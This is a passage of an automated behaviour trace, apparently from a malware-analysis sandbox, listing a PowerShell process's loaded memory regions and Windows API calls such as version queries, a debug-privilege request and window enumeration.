0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 993 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 994 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 995 start_va = 0x51d0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 996 start_va = 0x5350000 end_va = 0x538ffff entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 997 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 998 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 999 start_va = 0x5390000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 1000 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1001 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1002 start_va = 0x5390000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 1003 start_va = 0x5430000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 1053 start_va = 0x4790000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 1055 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 53 os_tid = 0xb48 [0048.371] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0049.389] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.389] GetLastError () returned 0x2 [0049.390] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.390] GetLastError () returned 0x2 [0049.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.395] GetLastError () returned 0x2 [0049.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ea18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.400] GetLastError () returned 0x2 [0049.400] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.400] GetLastError () returned 0x2 [0049.401] SetErrorMode (uMode=0x1) returned 0x1 [0049.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14ee98 | out: lpFileInformation=0x14ee98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0049.402] GetLastError () returned 0x2 [0049.402] SetErrorMode (uMode=0x1) returned 0x1 [0049.405] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14ef1c | out: lpdwHandle=0x14ef1c) returned 0x94c [0049.407] GetLastError () returned 0x0 [0049.408] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f24f08 | out: lpData=0x1f24f08) returned 1 [0049.410] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14eee8, puLen=0x14eee4 | out: lplpBuffer=0x14eee8*=0x1f24fa4, puLen=0x14eee4) returned 1 [0049.412] lstrlenW (lpString="䅁") returned 1 [0049.428] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25080, puLen=0x14ee60) returned 1 [0049.428] lstrlenW (lpString="Microsoft Corporation") returned 21 [0049.429] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f250d4, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="System.Management.Automation") returned 28 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25130, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25170, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f251d8, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25274, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f252d8, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25354, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f24ffc, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x0, puLen=0x14ee60) returned 0 [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x0, puLen=0x14ee60) returned 0 [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x0, puLen=0x14ee60) returned 0 [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ee58, puLen=0x14ee54 | out: lplpBuffer=0x14ee58*=0x1f24fa4, puLen=0x14ee54) returned 1 [0049.432] VerLanguageNameW (in: wLang=0x0, szLang=0x3175c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0049.432] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\", lplpBuffer=0x14ee6c, puLen=0x14ee68 | out: lplpBuffer=0x14ee6c*=0x1f24f30, puLen=0x14ee68) returned 1 [0049.439] GetCurrentProcessId () returned 0xb44 [0049.482] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14e6a4 | out: lpLuid=0x14e6a4*(LowPart=0x14, HighPart=0)) returned 1 [0049.483] GetLastError () returned 0x0 [0049.484] GetCurrentProcess () returned 0xffffffff [0049.484] GetLastError () returned 0x0 [0049.485] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x14e6a0 | out: TokenHandle=0x14e6a0*=0x2e0) returned 1 [0049.485] GetLastError () returned 0x0 [0049.487] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x1f27a48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0049.487] GetLastError () returned 0x514 [0049.489] CloseHandle (hObject=0x2e0) returned 1 [0049.489] GetLastError () returned 0x514 [0049.493] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x2e0 [0049.493] GetLastError () returned 0x514 [0049.500] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x1f27a8c, cb=0x100, lpcbNeeded=0x14ee94 | out: lphModule=0x1f27a8c, lpcbNeeded=0x14ee94) returned 1 [0049.501] GetLastError () returned 0x514 [0049.503] GetModuleInformation (in: hProcess=0x2e0, hModule=0x22020000, lpmodinfo=0x1f27bcc, cb=0xc | out: lpmodinfo=0x1f27bcc*(lpBaseOfDll=0x22020000, SizeOfImage=0x72000, EntryPoint=0x22027363)) returned 1 [0049.503] GetLastError () returned 0x514 [0049.505] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x22020000, lpBaseName=0x358040, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0049.505] GetLastError () returned 0x514 [0049.506] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x22020000, lpFilename=0x358040, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0049.506] GetLastError () returned 0x514 [0049.506] CloseHandle (hObject=0x2e0) returned 1 [0049.506] GetLastError () returned 0x514 [0049.508] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb44) returned 0x2e0 [0049.508] GetLastError () returned 0x514 [0049.510] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1f2707c | out: lpExitCode=0x1f2707c*=0x103) returned 1 [0049.510] GetLastError () returned 0x514 [0049.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f25278, Length=0x20000, ResultLength=0x14eedc | out: SystemInformation=0x2f25278, ResultLength=0x14eedc*=0xaa98) returned 0x0 [0049.536] EnumWindows (lpEnumFunc=0x1c83612, lParam=0x0) returned 1 [0049.538] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x664 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200aa, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x5007c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.540] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.540] GetLastError () returned 0x514 [0049.540] GetWindowThreadProcessId (in: hWnd=0x301e4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0xb48 [0049.540] GetLastError () returned 0x514 [0049.541] GetWindow (hWnd=0x301e4, uCmd=0x4) returned 0x0 [0049.542] IsWindowVisible (hWnd=0x301e4) returned 0 [0049.542] GetWindowThreadProcessId (in: hWnd=0x601a4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.542] GetLastError () returned 0x514 [0049.542] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.542] GetLastError () returned 0x514 [0049.542] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.542] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x98c [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x898 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x888 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x878 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x868 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x858 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x848 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x838 [0049.543] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x828 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x818 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x808 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x624 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1c4 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7ec [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x240 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x404 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x21c [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x738 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x748 [0049.544] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1f4 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x320 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x184 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7a0 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x400dc, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7bc [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x674 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x674 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.545] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2008c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2008e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2009a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x20080, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x3cc [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100ea, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x76c [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x730 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x50076, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x704 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] 